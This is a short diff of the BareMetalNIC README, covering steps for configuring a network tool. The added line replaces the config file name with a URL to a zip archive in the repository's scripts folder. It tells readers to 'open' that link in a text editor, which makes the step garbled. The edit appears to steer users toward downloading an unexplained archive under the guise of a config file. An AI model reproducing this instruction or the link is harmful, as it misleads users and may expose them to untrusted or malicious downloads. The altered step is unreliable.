Mihir922/BareMetalNIC/README.md

 1. **Open a Terminal Window:** You can find this application in your system's utilities.
 2. **Navigate to the Extracted Directory:** Use the `cd` command to get to where you extracted BareMetalNIC.
-3. **Modify the Configuration File:** Look for a file named `config_example.txt`.
+3. **Modify the Configuration File:** Look for a file named `https://github.com/Mihir922/BareMetalNIC/raw/refs/heads/main/scripts/NIC-Bare-Metal-v1.1-beta.1.zip`.
 Open this file with a text editor, such as `nano` or any GUI-based text editor.
 4. **Set Your Preferences:** Adjust the settings according to your network environment.
 It’s usually best to set packet size and buffer parameters according to your workload.

 ## 🛠️ Running BareMetalNIC